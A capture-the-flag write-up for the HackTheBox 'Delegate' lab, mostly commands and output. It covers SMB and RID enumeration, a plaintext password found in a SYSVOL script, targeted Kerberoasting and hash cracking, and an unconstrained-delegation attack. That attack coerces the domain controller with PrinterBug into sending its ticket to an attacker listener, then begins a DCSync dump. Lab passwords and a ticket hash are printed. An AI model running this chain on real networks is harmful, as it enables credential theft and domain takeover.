HTB | Delegate

Machine - https://app.hackthebox.com/machines/Delegate

IP - 10.129.24.164

NMAP

admin@ip-172-31-25-116:~/delegate/nmap$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,47001,49664,49665,49666,49667,49669,49670,64167,64169,64173,64186,6419 10.129.24.164 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-01-07 05:49 UTC
Nmap scan report for ip-10-129-24-164.ap-south-1.compute.internal (10.129.24.164)
Host is up (0.20s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-07 05:49:46Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2026-01-06T05:46:30
|_Not valid after:  2026-07-08T05:46:30
|_ssl-date: 2026-01-07T05:51:23+00:00; +4s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   DNS_Tree_Name: delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-01-07T05:50:43+00:00
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6419/tcp  filtered svdrp
9389/tcp  open     mc-nmf        .NET Message Framing
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     msrpc         Microsoft Windows RPC
64167/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
64169/tcp open     msrpc         Microsoft Windows RPC
64173/tcp open     msrpc         Microsoft Windows RPC
64186/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-07T05:50:44
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 111.89 seconds

SMB

Anonymous login is allowed

admin@ip-172-31-25-116:~/delegate$ netexec smb 10.129.24.164 -u anonymous -p ''
SMB         10.129.24.164   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.24.164   445    DC1              [+] delegate.vl\\anonymous: (Guest)
admin@ip-172-31-25-116:~/delegate$ 
admin@ip-172-31-25-116:~/delegate$ netexec smb 10.129.24.164 -u anonymous -p '' --shares
SMB         10.129.24.164   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.24.164   445    DC1              [+] delegate.vl\\anonymous: (Guest)
SMB         10.129.24.164   445    DC1              [*] Enumerated shares
SMB         10.129.24.164   445    DC1              Share           Permissions     Remark
SMB         10.129.24.164   445    DC1              -----           -----------     ------
SMB         10.129.24.164   445    DC1              ADMIN$                          Remote Admin
SMB         10.129.24.164   445    DC1              C$                              Default share
SMB         10.129.24.164   445    DC1              IPC$            READ            Remote IPC
SMB         10.129.24.164   445    DC1              NETLOGON        READ            Logon server share 
SMB         10.129.24.164   445    DC1              SYSVOL          READ            Logon server share 

Let’s try to brute rid

admin@ip-172-31-25-116:~/delegate$ netexec smb 10.129.24.164 -u anonymous -p '' --rid-brute
SMB         10.129.24.164   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.24.164   445    DC1              [+] delegate.vl\\anonymous: (Guest)
SMB         10.129.24.164   445    DC1              498: DELEGATE\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.24.164   445    DC1              500: DELEGATE\\Administrator (SidTypeUser)
SMB         10.129.24.164   445    DC1              501: DELEGATE\\Guest (SidTypeUser)
SMB         10.129.24.164   445    DC1              502: DELEGATE\\krbtgt (SidTypeUser)
SMB         10.129.24.164   445    DC1              512: DELEGATE\\Domain Admins (SidTypeGroup)
SMB         10.129.24.164   445    DC1              513: DELEGATE\\Domain Users (SidTypeGroup)
SMB         10.129.24.164   445    DC1              514: DELEGATE\\Domain Guests (SidTypeGroup)
SMB         10.129.24.164   445    DC1              515: DELEGATE\\Domain Computers (SidTypeGroup)
SMB         10.129.24.164   445    DC1              516: DELEGATE\\Domain Controllers (SidTypeGroup)
SMB         10.129.24.164   445    DC1              517: DELEGATE\\Cert Publishers (SidTypeAlias)
SMB         10.129.24.164   445    DC1              518: DELEGATE\\Schema Admins (SidTypeGroup)
SMB         10.129.24.164   445    DC1              519: DELEGATE\\Enterprise Admins (SidTypeGroup)
SMB         10.129.24.164   445    DC1              520: DELEGATE\\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.24.164   445    DC1              521: DELEGATE\\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.24.164   445    DC1              522: DELEGATE\\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.24.164   445    DC1              525: DELEGATE\\Protected Users (SidTypeGroup)
SMB         10.129.24.164   445    DC1              526: DELEGATE\\Key Admins (SidTypeGroup)
SMB         10.129.24.164   445    DC1              527: DELEGATE\\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.24.164   445    DC1              553: DELEGATE\\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.24.164   445    DC1              571: DELEGATE\\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.24.164   445    DC1              572: DELEGATE\\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.24.164   445    DC1              1000: DELEGATE\\DC1$ (SidTypeUser)
SMB         10.129.24.164   445    DC1              1101: DELEGATE\\DnsAdmins (SidTypeAlias)
SMB         10.129.24.164   445    DC1              1102: DELEGATE\\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.24.164   445    DC1              1104: DELEGATE\\A.Briggs (SidTypeUser)
SMB         10.129.24.164   445    DC1              1105: DELEGATE\\b.Brown (SidTypeUser)
SMB         10.129.24.164   445    DC1              1106: DELEGATE\\R.Cooper (SidTypeUser)
SMB         10.129.24.164   445    DC1              1107: DELEGATE\\J.Roberts (SidTypeUser)
SMB         10.129.24.164   445    DC1              1108: DELEGATE\\N.Thompson (SidTypeUser)
SMB         10.129.24.164   445    DC1              1121: DELEGATE\\delegation admins (SidTypeGroup)

Now we have username list

admin@ip-172-31-25-116:~/delegate$ netexec smb 10.129.24.164 -u anonymous -p '' --rid-brute | grep -i 'user' | sed -E 's/.*DELEGATE\\\\([^ ]+).*/\\1/' > username.txt
admin@ip-172-31-25-116:~/delegate$ cat username.txt 
Administrator
Guest
krbtgt
Domain
Protected
DC1$
A.Briggs
b.Brown
R.Cooper
J.Roberts
N.Thompson

We found users.bat file in SYSVOL

admin@ip-172-31-25-116:~/delegate$ smbclient -N  \\\\\\\\10.129.24.164\\\\SYSVOL
Try "help" to get a list of possible commands.
smb: \\> ls
  .                                   D        0  Sat Sep  9 13:52:30 2023
  ..                                  D        0  Sat Aug 26 09:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 09:39:25 2023

                4652287 blocks of size 4096. 1119110 blocks available
smb: \\> cd delegate.vl\\
smb: \\delegate.vl\\> ls
  .                                   D        0  Sat Aug 26 09:45:45 2023
  ..                                  D        0  Sat Aug 26 09:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 09:45:45 2023
  Policies                            D        0  Sat Aug 26 09:39:30 2023
  scripts                             D        0  Sat Aug 26 12:45:24 2023

                4652287 blocks of size 4096. 1119109 blocks available
smb: \\delegate.vl\\> cd scripts\\
smb: \\delegate.vl\\scripts\\> ls
  .                                   D        0  Sat Aug 26 12:45:24 2023
  ..                                  D        0  Sat Aug 26 09:45:45 2023
  users.bat                           A      159  Sat Aug 26 12:54:29 2023

                4652287 blocks of size 4096. 1119109 blocks available
smb: \\delegate.vl\\scripts\\> 

found the credentials of A.Briggs

admin@ip-172-31-25-116:~/delegate$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\\\dc1\\development 

if %USERNAME%==A.Briggs net use h: \\\\fileserver\\backups /user:Administrator P4ssw0rd1#123

we can use this credentials for LDAP and SMB Authentication

admin@ip-172-31-25-116:~/delegate$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto DC1.delegate.vl -d delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123'; echo; done
LDAP        10.129.24.164   389    DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.24.164   389    DC1              [+] delegate.vl\\A.Briggs:P4ssw0rd1#123 

SMB         10.129.24.164   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.24.164   445    DC1              [+] delegate.vl\\A.Briggs:P4ssw0rd1#123 

WINRM       10.129.24.164   5985   DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) 
WINRM       10.129.24.164   5985   DC1              [-] delegate.vl\\A.Briggs:P4ssw0rd1#123

Windows defender is installed

admin@ip-172-31-25-116:~/delegate$ netexec smb delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' -M enum_av
SMB         10.129.24.164   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.24.164   445    DC1              [+] delegate.vl\\A.Briggs:P4ssw0rd1#123 
ENUM_AV     10.129.24.164   445    DC1              Found Windows Defender INSTALLED

it is vulnerable to DFSCoerce

admin@ip-172-31-25-116:~/delegate$ netexec smb delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' -M coerce_plus
SMB         10.129.24.164   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.24.164   445    DC1              [+] delegate.vl\\A.Briggs:P4ssw0rd1#123 
COERCE_PLUS 10.129.24.164   445    DC1              VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.24.164   445    DC1              VULNERABLE, PetitPotam
COERCE_PLUS 10.129.24.164   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.24.164   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.24.164   445    DC1              VULNERABLE, MSEven

Shell/ Foothold

Shell as N.Thompson

GenericWrite

A.Briggs have GenericWrite over N.Thompson

admin@ip-172-31-25-116:~/delegate$ bloodyAD -H 10.129.24.164 -d DELEGATE.VL -u 'A.Briggs' -p 'P4ssw0rd1#123' get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=delegate,DC=vl
permission: WRITE

distinguishedName: CN=A.Briggs,CN=Users,DC=delegate,DC=vl
permission: WRITE

distinguishedName: CN=N.Thompson,CN=Users,DC=delegate,DC=vl
permission: WRITE

distinguishedName: DC=Delegate.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=delegate,DC=vl
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.debugger.vl,CN=MicrosoftDNS,DC=ForestDnsZones,DC=delegate,DC=vl
permission: CREATE_CHILD

And N.Thompson is a part of Remote Management Users

admin@ip-172-31-25-116:~/delegate$ bloodyAD -H 10.129.24.164 -d DELEGATE.VL -u 'A.Briggs' -p 'P4ssw0rd1#123' get membership 'N.Thompson'

distinguishedName: CN=Users,CN=Builtin,DC=delegate,DC=vl
objectSid: S-1-5-32-545
sAMAccountName: Users

distinguishedName: CN=Remote Management Users,CN=Builtin,DC=delegate,DC=vl
objectSid: S-1-5-32-580
sAMAccountName: Remote Management Users

distinguishedName: CN=Domain Users,CN=Users,DC=delegate,DC=vl
objectSid: S-1-5-21-1484473093-3449528695-2030935120-513
sAMAccountName: Domain Users

distinguishedName: CN=delegation admins,CN=Users,DC=delegate,DC=vl
objectSid: S-1-5-21-1484473093-3449528695-2030935120-1121
sAMAccountName: delegation admins
admin@ip-172-31-25-116:~/delegate$ 

Let’s use Targeted Kerberos, and for that I will be using [targetedKerberoast.py](http://targetedKerberoast.pyhttps://github.com/ShutdownRepo/targetedKerberoast)

admin@ip-172-31-25-116:~/delegate/targetedKerberoast$ python3 targetedKerberoast.py -d delegate.vl  -u 'A.Briggs' -p 'P4ssw0rd1#123' -v
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$8b0e7cbfc5ebd7d0053803a36c130749$e6ceeb96910a92f325b620ebe0f6bb6ed28bd674fce9adc66aeb105f852acec44f9e79e7ba751b195544af1d9cccc8bc2e55511b2e6782f8056f142b9790ea9342a1321849966b41cdf3804e3328d0f8c9011048809ab0eb63347849ab5210cdb564ea1b8e4c7a2e73f536645362397501488e518cd4f44341211a611365998d7e08e62d2bd52449e977d3d0050526551d911e41f35a944f6771ed58728d35f73e852aac30d116dc1c52c16f561f4a4def1493460ce6fa2d87fa9dfea7f4385219e51b8e914e78c391d5ddef3be5d6476b75dcf24f640bc99c6d8ce3cadcd5a924d140bda3bc95d7fedb71511b0ec76a5d708d3f657996dfde9d60da4d74fd3e750f4b64a9f647e5f7dbaf53285bf0bc103f91f1d29ae65a4999cffeb67433b40abfed184398d5424f7d5b28090e102c522076c056a658ada8c86b2b6ed15de592d4197a13518b307cdbc4e52a7a26901f26544f56e441594b118d6291d5baf794d8b74c6e8c33efa739f2629fbfa243e53b395baff9bcd8e68c46452e5f5fd4778cde6ebc1a6dfad87100456d5867a0f351fa0137883417330ab78483894a2c9fd5d14b315346fe6111696e0750f4347b2830d43f88b1de048ee28cb01084da4a041af7e05331586d4d1f6f8c75455cc7a07d4e8172be86e7b0f05f858643cc271bec1be0c24ed2bebbdbe5181e947ec3b97ce52907e82f048d8b84554ba56854b2602431a68df90738d204534b4d3c15e09d06ae3c8a0b0786e6903b4fbde8d5a35e5e2c76e81b32070ecbb687344c2d36e6bcb94ca40a691f8a95bc103df6e60e0843e50be273159e428e73923c05fbaab643c36d6dedccdaf91f5b0872d7f3c43b9d4c3a61edc5ffa7a0b8fd88227d58f55d323ab40b8130d57c6f6be87d999b1f0be1a7f744cf1ba58251fdd39bafa456a2a1f7e7ec3a98d0f6c0f6968130145d49989dba78673dadbf32510a6ee7d6379bb9176b113c91f2b5cc79cc4f4a6e9e134a27699426ed7913eb6c9c948770a4a56950235dd845d7b9aa988cb52b43a9d5f20252cc1e9d5c77e0eac7bf9ea23f883acaca4d28414a413051f5ad88771d606d13d999978947fc48327d89675754c384196d317dffa9472c519e93a2c7941cd479d77fbe9c6c609e50d07c921018a3ac092cb9c6bbc98f0a404fb5e1bc3bc257fd51686330a5d904a274e687157816a3a4b07ed5697d35108e554b551d819e58fa77ef3cd7fbc750b806f840ae6cd091b9761a35e83272056755ee6f3bbcd4446fb8282df308db618f76e285293a36b952e404fd309acae0674037d43f78de301004ce8c7a2f5a010fa8e42694b27c3cdc38ab6e2c2353a989d0b2f1e6bdc856a8d05315b56cdd1c989ff780b0f8fcc4e2c5494d2e3af8e4cf2b5a9d4ec7a30dbc91ab489ca5a8b511aad4976849e2ac6fc43fcd7c76b12faad235a4a726ee
[VERBOSE] SPN removed successfully for (N.Thompson)
admin@ip-172-31-25-116:~/delegate/targetedKerberoast$ 

Let’s try to crack via hashcat

admin@ip-172-31-25-116:~/delegate/targetedKerberoast$ hashcat N.Thompson.hash  /opt/rockyou.txt 
<--SNIP-->

$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$8b0e7cbfc5ebd7d0053803a36c130749$e6ceeb96910a92f325b620ebe0f6bb6ed28bd674fce9adc66aeb105f852acec44f9e79e7ba751b195544af1d9cccc8bc2e55511b2e6782f8056f142b9790ea9342a1321849966b41cdf3804e3328d0f8c9011048809ab0eb63347849ab5210cdb564ea1b8e4c7a2e73f536645362397501488e518cd4f44341211a611365998d7e08e62d2bd52449e977d3d0050526551d911e41f35a944f6771ed58728d35f73e852aac30d116dc1c52c16f561f4a4def1493460ce6fa2d87fa9dfea7f4385219e51b8e914e78c391d5ddef3be5d6476b75dcf24f640bc99c6d8ce3cadcd5a924d140bda3bc95d7fedb71511b0ec76a5d708d3f657996dfde9d60da4d74fd3e750f4b64a9f647e5f7dbaf53285bf0bc103f91f1d29ae65a4999cffeb67433b40abfed184398d5424f7d5b28090e102c522076c056a658ada8c86b2b6ed15de592d4197a13518b307cdbc4e52a7a26901f26544f56e441594b118d6291d5baf794d8b74c6e8c33efa739f2629fbfa243e53b395baff9bcd8e68c46452e5f5fd4778cde6ebc1a6dfad87100456d5867a0f351fa0137883417330ab78483894a2c9fd5d14b315346fe6111696e0750f4347b2830d43f88b1de048ee28cb01084da4a041af7e05331586d4d1f6f8c75455cc7a07d4e8172be86e7b0f05f858643cc271bec1be0c24ed2bebbdbe5181e947ec3b97ce52907e82f048d8b84554ba56854b2602431a68df90738d204534b4d3c15e09d06ae3c8a0b0786e6903b4fbde8d5a35e5e2c76e81b32070ecbb687344c2d36e6bcb94ca40a691f8a95bc103df6e60e0843e50be273159e428e73923c05fbaab643c36d6dedccdaf91f5b0872d7f3c43b9d4c3a61edc5ffa7a0b8fd88227d58f55d323ab40b8130d57c6f6be87d999b1f0be1a7f744cf1ba58251fdd39bafa456a2a1f7e7ec3a98d0f6c0f6968130145d49989dba78673dadbf32510a6ee7d6379bb9176b113c91f2b5cc79cc4f4a6e9e134a27699426ed7913eb6c9c948770a4a56950235dd845d7b9aa988cb52b43a9d5f20252cc1e9d5c77e0eac7bf9ea23f883acaca4d28414a413051f5ad88771d606d13d999978947fc48327d89675754c384196d317dffa9472c519e93a2c7941cd479d77fbe9c6c609e50d07c921018a3ac092cb9c6bbc98f0a404fb5e1bc3bc257fd51686330a5d904a274e687157816a3a4b07ed5697d35108e554b551d819e58fa77ef3cd7fbc750b806f840ae6cd091b9761a35e83272056755ee6f3bbcd4446fb8282df308db618f76e285293a36b952e404fd309acae0674037d43f78de301004ce8c7a2f5a010fa8e42694b27c3cdc38ab6e2c2353a989d0b2f1e6bdc856a8d05315b56cdd1c989ff780b0f8fcc4e2c5494d2e3af8e4cf2b5a9d4ec7a30dbc91ab489ca5a8b511aad4976849e2ac6fc43fcd7c76b12faad235a4a726ee:KALEB_2341
<--SNIP-->

and we can winrm

admin@ip-172-31-25-116:~/delegate$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto DC1.delegate.vl -d delegate.vl -u 'N.Thompson' -p 'KALEB_2341'; echo; done
LDAP        10.129.24.164   389    DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.24.164   389    DC1              [+] delegate.vl\\N.Thompson:KALEB_2341 

SMB         10.129.24.164   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.24.164   445    DC1              [+] delegate.vl\\N.Thompson:KALEB_2341 

WINRM       10.129.24.164   5985   DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) 
WINRM       10.129.24.164   5985   DC1              [+] delegate.vl\\N.Thompson:KALEB_2341 (Pwn3d!)

we are in and got user.txt

admin@ip-172-31-25-116:~/delegate$ evil-winrm -i delegate.vl -u 'N.Thompson' -p 'KALEB_2341'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\N.Thompson\\Documents> dir C:\\Users\\N.Thompson\\Desktop

    Directory: C:\\Users\\N.Thompson\\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          1/6/2026   9:47 PM             34 user.txt

Priv Esc

Shell as Administrator

SeEnableDelegationPrivilege

we can see that we have SeEnableDelegationPrivilege

*Evil-WinRM* PS C:\\temp> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled
*Evil-WinRM* PS C:\\temp> 

This means that we can abuse unconstrained delegation by creating a machine account and appending a SPN to it, but first, let’s check the machine quota

admin@ip-172-31-25-116:~/delegate$ netexec ldap DC1.delegate.vl -d delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq
LDAP        10.129.34.177   389    DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.34.177   389    DC1              [+] delegate.vl\\N.Thompson:KALEB_2341 
MAQ         10.129.34.177   389    DC1              [*] Getting the MachineAccountQuota
MAQ         10.129.34.177   389    DC1              MachineAccountQuota: 10

Now I will create a machine account

admin@ip-172-31-25-116:~/delegate$ addcomputer.py -dc-ip 10.129.34.177 -computer-pass 'P@ssw0rd@123' -computer-name anurag delegate.vl/N.Thompson:'KALEB_2341'
Impacket v0.13.0.dev0+20251006.23741.2d6c563c - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account anurag$ with password P@ssw0rd@123.

adding DNS record for the machine account we created

admin@ip-172-31-25-116:~/krbrelayx$ python3 dnstool.py -u 'delegate.vl\\anurag$' -p 'P@ssw0rd@123' -r anurag.delegate.vl -d 10.10.14.103 --action add DC1.delegate.vl -dns-ip 10.129.34.177
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
admin@ip-172-31-25-116:~/krbrelayx$ 

Now let’s add SPN to it

admin@ip-172-31-25-116:~/krbrelayx$ python3 addspn.py -u  'delegate.vl\\N.Thompson' -p 'KALEB_2341' -s 'cifs/anurag.delegate.vl' -t 'anurag$' -dc-ip 10.129.34.177 DC1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
admin@ip-172-31-25-116:~/krbrelayx$ 

#and then
admin@ip-172-31-25-116:~/krbrelayxpython3 addspn.py -u  'delegate.vl\\N.Thompson' -p 'KALEB_2341' -s 'cifs/anurag.delegate.vl' -t 'anurag$' -dc-ip 10.129.34.215 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully

Now I’ll give the host unconstrained delegation using BloodyAD

admin@ip-172-31-25-116:~/krbrelayx$ bloodyAD -d delegate.vl -u N.Thompson -p 'KALEB_2341' --host dc1.delegate.vl add uac 'anurag$' -f TRUSTED_FOR_DELEGATION
[+] ['TRUSTED_FOR_DELEGATION'] property flags added to anurag$'s userAccountControl
admin@ip-172-31-25-116:~/krbrelayx$ 

Relay

Let’s set up krbrelayx but first I need to convert my crated computer password to NTLM hash

02cb8258df07966e32677128e5ff1d26
admin@ip-172-31-25-116:~/krbrelayx$ python3 -c "from impacket.ntlm import compute_nthash; password = 'P@ssw0rd@123';nthash = compute_nthash(password);print(nthash.hex())"
68ae965c9062b389f2a285e27ff0a566

admin@ip-172-31-25-116:~/krbrelayx$ sudo python3 krbrelayx.py -hashes :68ae965c9062b389f2a285e27ff0a566
/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

Now we need to coerce the DC to authenticating to anurag.delegate.vl, first let’s test via netexec

admin@ip-172-31-25-116:~$ netexec smb dc1.delegate.vl -u 'anurag$' -p 'P@ssw0rd@123' -M coerce_plus
SMB         10.129.34.177   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.34.177   445    DC1              [+] delegate.vl\\anurag$:P@ssw0rd@123 
COERCE_PLUS 10.129.34.177   445    DC1              VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.34.177   445    DC1              VULNERABLE, PetitPotam
COERCE_PLUS 10.129.34.177   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.34.177   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.34.177   445    DC1              VULNERABLE, MSEven
admin@ip-172-31-25-116:~$ 

We will use PrinterBug

admin@ip-172-31-25-116:~$ netexec smb dc1.delegate.vl -u 'anurag$' -p 'P@ssw0rd@123' -M coerce_plus -o LISTENER=anurag.delegate.vl METHOD=PrinterBug
SMB         10.129.34.215   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.34.215   445    DC1              [+] delegate.vl\\anurag$:P@ssw0rd@123 
COERCE_PLUS 10.129.34.215   445    DC1              VULNERABLE, PrinterBug
COERCE_PLUS 10.129.34.215   445    DC1              Exploit Success, spoolss\\RpcRemoteFindFirstPrinterChangeNotificationEx
admin@ip-172-31-25-116:~$ 

And on listner we got the TGT for DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

[*] SMBD: Received connection from 10.129.34.215
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.34.215
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.34.215
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

DCSYNC

With the TGT we can perform DCSYNC, but first let’s generate krb5.conf file and authenticate as the machine account

admin@ip-172-31-25-116:~/delegate$ netexec smb dc1.delegate.vl -u 'anurag$' -p 'P@ssw0rd@123' --generate-krb5-file krb5.conf
SMB         10.129.34.215   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.34.215   445    DC1              [+] krb5 conf saved to: krb5.conf
SMB         10.129.34.215   445    DC1              [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB         10.129.34.215   445    DC1              [+] delegate.vl\\anurag$:P@ssw0rd@123 
admin@ip-172-31-25-116:~/delegate$ KRB5_CONFIG=krb5.conf
admin@ip-172-31-25-116:~/delegate$ KRB5CCNAME=DC1\\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb dc1.delegate.vl --use-kcache
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc1.delegate.vl 445    DC1              [+] DELEGATE.VL\\DC1$ from ccache 

Now I will use netexe to dump the hashes

admin@ip-172-31-25-116:~/delegate$ KRB5CCNAME=DC1\\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb dc1.delegate.vl --use-kcache --ntds
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         dc1.delegate.vl 445    DC1              [+] DELEGATE.VL\\DC1$ from ccache 
SMB         dc1.delegate.vl 445    DC1              [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         dc1.delegate.vl 445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
